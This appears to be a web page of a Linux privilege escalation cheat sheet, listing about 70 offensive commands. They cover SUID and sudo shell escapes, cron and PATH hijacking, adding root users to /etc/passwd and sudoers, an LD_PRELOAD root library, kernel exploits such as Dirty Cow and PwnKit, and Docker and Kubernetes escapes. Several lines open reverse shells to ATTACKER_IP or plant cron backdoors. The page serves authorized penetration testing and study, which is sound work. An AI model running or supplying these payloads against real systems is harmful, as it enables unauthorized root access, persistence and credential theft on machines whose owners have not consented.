Linux Privilege Escalation Cheat Sheet

Linux privilege escalation techniques: SUID, sudo misconfigs, cron jobs, capabilities, writable files, path hijacking, kernel exploits, and container escapes. (70 payloads)

Enumeration

(16)

id && whoami && hostname && uname -a

Basic identity and kernel info

cat /etc/passwd | grep -v nologin | grep -v false

List login-capable users

sudo -l

List sudo privileges for current user — key privesc starting point

cat /etc/crontab && ls -la /etc/cron.*

List all cron jobs

find / -perm -u=s -type f 2>/dev/null

Find all SUID binaries

find / -perm -g=s -type f 2>/dev/null

Find all SGID binaries

getcap -r / 2>/dev/null

Find binaries with Linux capabilities set

find / -writable -type f 2>/dev/null | grep -v proc

Find world-writable files

env && cat ~/.bash_history && cat ~/.bashrc

Check environment variables and shell history

cat /proc/version && cat /etc/issue && uname -r

Kernel version for exploit research

ps aux | grep root

Running processes owned by root

ss -tlnp && netstat -tlnp 2>/dev/null

Listening ports — internal services not exposed externally

find / -name "*.conf" -readable 2>/dev/null | xargs grep -l "password" 2>/dev/null

Search readable config files for passwords

cat /etc/sudoers 2>/dev/null && cat /etc/sudoers.d/* 2>/dev/null

Read sudoers file if accessible

ls -la /home/*/.*

Check home directory dotfiles for credentials

find / -name id_rsa -o -name id_ecdsa -o -name id_ed25519 2>/dev/null

Find SSH private keys

SUID / SGID Binaries (GTFOBins)

(15)

/usr/bin/find . -exec /bin/sh -p \;

find SUID — execute shell with SUID permissions

vim -c ":!/bin/sh"

vim SUID — spawn shell from within vim

python3 -c "import os; os.execl('/bin/sh', 'sh', '-p')"

python SUID — exec shell preserving SUID

perl -e 'exec "/bin/sh";'

perl SUID — exec shell

ruby -e 'exec "/bin/sh"'

ruby SUID — exec shell

awk 'BEGIN {system("/bin/sh")}'

awk SUID — system call to shell

less /etc/passwd
!/bin/sh

less SUID — escape to shell via ! command

nmap --interactive
nmap> !sh

nmap (old versions) SUID interactive mode shell escape

bash -p

bash SUID — -p flag preserves effective UID

cp /bin/bash /tmp/rootbash && chmod +s /tmp/rootbash
/tmp/rootbash -p

cp SUID — copy bash with SUID bit, then execute it

tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh

tar SUID — checkpoint action to execute shell

node -e "require('child_process').spawn('/bin/sh', {
  stdio: [0,1,2]
})"

node SUID — spawn shell

env /bin/sh -p

env SUID — preserve effective UID

strace -o /dev/null /bin/sh -p

strace SUID — run shell under strace, preserving SUID

tclsh
exec /bin/sh <@stdin >@stdout 2>@stderr

tclsh SUID — exec shell with I/O redirection

Sudo Misconfigurations

(12)

# sudo -l output → (root) NOPASSWD: /bin/vim
sudo vim -c ":!/bin/bash"

NOPASSWD vim — open shell from vim command mode

# sudo -l → (root) NOPASSWD: /usr/bin/find
sudo find . -exec /bin/sh \; -quit

NOPASSWD find — execute shell via -exec

# sudo -l → (root) NOPASSWD: /usr/bin/python3
sudo python3 -c "import os; os.system('/bin/bash')"

NOPASSWD python3 — system call to bash

# sudo -l → (root) NOPASSWD: /usr/bin/less
sudo less /etc/passwd
!/bin/sh

NOPASSWD less — shell escape via ! in less pager

# sudo -l → (ALL, !root) /bin/bash
# CVE-2019-14287: sudo < 1.8.28 bypass
sudo -u#-1 /bin/bash

Sudo -u#-1 bypass (CVE-2019-14287) — sudo < 1.8.28

# LD_PRELOAD trick (requires env_keep += LD_PRELOAD in sudoers)
cat > /tmp/evil.c << EOF
#include <stdio.h>
#include <unistd.h>
void _init() {
    unsetenv("LD_PRELOAD");
    setuid(0); setgid(0);
    system("/bin/bash");
}
EOF
gcc -fPIC -shared -nostartfiles -o /tmp/evil.so /tmp/evil.c
sudo LD_PRELOAD=/tmp/evil.so <allowed_command>

LD_PRELOAD abuse — requires env_keep in sudoers

# sudo -l → (root) NOPASSWD: /usr/bin/wget
sudo wget http://attacker.com/passwd -O /etc/passwd

NOPASSWD wget — overwrite /etc/passwd

# sudo -l → (root) NOPASSWD: /usr/bin/tee
echo "root2:$(openssl passwd -1 password):0:0:root:/root:/bin/bash" | sudo tee -a /etc/passwd

NOPASSWD tee — append new root user to /etc/passwd

# sudo -l → (root) /bin/bash /path/to/script.sh
# If script sources a file in a writable dir:
echo "bash -i" > /writable/path/sourced.sh

Script path hijacking — inject into sourced file

# sudo -l → (root) NOPASSWD: /usr/bin/git
sudo git -p help config
!/bin/sh

NOPASSWD git — pager escape to shell

# sudo -l → (root) NOPASSWD: /usr/bin/zip
TF=$(mktemp -u)
sudo zip $TF /etc/hosts -T --unzip-command="sh -c /bin/sh"

NOPASSWD zip — unzip-command shell escape

# sudo -l → (root) NOPASSWD: /usr/bin/apt-get
sudo apt-get update -o APT::Update::Pre-Invoke::="/bin/sh"

NOPASSWD apt-get — Pre-Invoke hook to shell

Cron Job Exploitation

(5)

cat /etc/crontab
crontab -l
ls -la /etc/cron.d/ /etc/cron.daily/ /etc/cron.hourly/
cat /var/spool/cron/crontabs/*

Enumerate all cron jobs — look for writable scripts

# If cron runs /opt/cleanup.sh as root and file is world-writable:
echo "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1" >> /opt/cleanup.sh

Append reverse shell to world-writable cron script

# If cron uses relative PATH and /tmp is writable:
# crontab: * * * * * backup.sh
export PATH=/tmp:$PATH
echo "#!/bin/bash
bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1" > /tmp/backup.sh
chmod +x /tmp/backup.sh

PATH hijacking — cron uses relative command name

# Wildcard injection in cron tar command:
# * * * * * root tar czf /backup.tgz /opt/data/*
cd /opt/data
touch -- "--checkpoint=1"
touch -- "--checkpoint-action=exec=sh revshell.sh"
echo "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1" > revshell.sh
chmod +x revshell.sh

tar wildcard injection via checkpoint flags

# Writable cron.d directory:
echo "* * * * * root bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1" > /etc/cron.d/backdoor

Write new root cron job if cron.d is writable

Writable File Exploitation

(5)

# /etc/passwd writable → add new root user
echo "hacker:$(openssl passwd -1 -salt xyz hacked):0:0:root:/root:/bin/bash" >> /etc/passwd
su hacker  # password: hacked

Add new root user to writable /etc/passwd

# /etc/shadow writable → replace root password hash
python3 -c "import crypt; print(crypt.crypt('password', crypt.mksalt(crypt.METHOD_SHA512)))"
# Replace root hash in /etc/shadow

Replace root hash in writable /etc/shadow

# /etc/sudoers writable → add NOPASSWD rule
echo "$(id -un) ALL=(ALL) NOPASSWD: ALL" >> /etc/sudoers
sudo bash

Add NOPASSWD ALL to writable sudoers

# Find files owned by root but writable by current user:
find / -user root -writable -type f 2>/dev/null | grep -v proc

Find root-owned world-writable files

# Append SSH key to root authorized_keys (if ~/.ssh writable):
mkdir -p /root/.ssh
echo "<your_public_key>" >> /root/.ssh/authorized_keys
chmod 600 /root/.ssh/authorized_keys

Append SSH public key to root authorized_keys

Linux Capabilities

(7)

# Find capabilities:
getcap -r / 2>/dev/null

# Dangerous capabilities:
# cap_setuid+ep → set UID to 0
# cap_net_raw+ep → raw socket access
# cap_sys_admin+ep → near-root
# cap_dac_read_search+ep → bypass file read checks

Enumerate and understand dangerous capabilities

# python3 with cap_setuid+ep:
python3 -c "import os; os.setuid(0); os.system('/bin/bash')"

python3 cap_setuid — set UID to 0 and spawn bash

# perl with cap_setuid+ep:
perl -e 'use POSIX (setuid); POSIX::setuid(0); exec "/bin/bash";'

perl cap_setuid — escalate to root

# vim with cap_setuid+ep:
vim -c ":py3 import os; os.setuid(0); os.execl('/bin/bash', 'bash', '-p')"

vim cap_setuid — use Python to setuid and spawn shell

# node with cap_setuid+ep:
node -e "process.setuid(0); require('child_process').spawn('/bin/bash', {stdio: [0,1,2]})"

node cap_setuid — set UID to 0 and spawn shell

# tar with cap_dac_read_search — read any file:
tar xf /etc/shadow -I cat

tar cap_dac_read_search — read /etc/shadow

# openssl with cap_setuid:
openssl req -engine /tmp/evil.so

openssl cap_setuid — load malicious engine to escalate

Kernel Exploits

(5)

# Dirty Cow (CVE-2016-5195) — kernel < 4.8.3
# Overwrite any file (e.g., /etc/passwd)
wget https://github.com/firefart/dirtycow/raw/master/dirty.c
gcc -pthread dirty.c -o dirty -lcrypt
./dirty <password>
# Creates /etc/passwd entry for firefart:password with root UID

Dirty Cow CVE-2016-5195 — overwrite /etc/passwd via PTRACE_POKETEXT

# Dirty Pipe (CVE-2022-0847) — kernel 5.8 to 5.16.11
# Overwrite read-only files
# PoC: https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits
./exploit /usr/bin/sudo

Dirty Pipe CVE-2022-0847 — overwrite SUID binaries to add shell backdoor

# PwnKit (CVE-2021-4034) — pkexec privilege escalation
# Affects polkit pkexec 0.105 and earlier (most distros before Jan 2022)
# PoC: https://github.com/ly4k/PwnKit
./PwnKit  # spawns root shell

PwnKit CVE-2021-4034 — pkexec out-of-bounds write → root

# overlayfs (CVE-2023-0386) — kernel < 6.2
# Unprivileged user namespace + overlayfs to escalate
# PoC: https://github.com/xkaneiki/CVE-2023-0386
./poc

overlayfs CVE-2023-0386 — FUSE + overlayfs SUID file bypass

# Automated kernel exploit suggester:
wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh
bash linux-exploit-suggester.sh

# Alternatively, run on local machine:
bash les.sh --kernelmode --uname "$(uname -r)"

linux-exploit-suggester.sh — match kernel version to known exploits

Docker / Container Escape

(5)

# Check if inside Docker:
cat /proc/1/cgroup | grep docker
ls /.dockerenv

# Check if privileged:
cat /proc/self/status | grep -i cap
# CapEff: 0000003fffffffff = full capabilities (privileged)

Detect Docker container and check if privileged

# Privileged container — mount host filesystem:
mkdir /mnt/host
mount /dev/sda1 /mnt/host
chroot /mnt/host bash
# Now in root shell on host filesystem

Privileged container: mount host drive and chroot

# Docker socket escape (if /var/run/docker.sock is accessible):
ls -la /var/run/docker.sock

docker run -v /:/host --rm -it ubuntu chroot /host bash
# Spawns root shell on host via new privileged container

docker.sock escape — launch new privileged container with host root mount

# cgroups v1 notify_on_release escape (CVE-2022-0492 style):
d=$(dirname $(ls -x /s*/fs/c*/*/r* | head -1))
mkdir -p $d/w; echo 1 > $d/w/notify_on_release
t=$(sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab)
touch /o; echo $t/c > $d/release_agent
echo "#!/bin/sh" > /c; echo "id > $t/o" >> /c; chmod +x /c
sh -c "echo 0 > $d/w/cgroup.procs"; sleep 1; cat /o

cgroups v1 notify_on_release RCE as host root

# Kubernetes: extract service account token:
cat /var/run/secrets/kubernetes.io/serviceaccount/token

# Use token to call API server:
KUBE_TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
curl -sSk -H "Authorization: Bearer $KUBE_TOKEN" \
  https://kubernetes.default.svc/api/v1/namespaces/default/secrets

K8s service account token — enumerate cluster secrets

ShareX LinkedIn Reddit

Level up your security testing

Install the CLI

npx payload-playground

Explore All Tools

Encoding, hashing, JWT & more

Browse Cheat Sheets

Quick-reference payload guides

Related Generators

Reverse Shell Command Injection

Related Cheat Sheets

Command Injection Cheat Sheet Windows Privilege Escalation Cheat Sheet Post-Exploitation Cheat Sheet

$loading...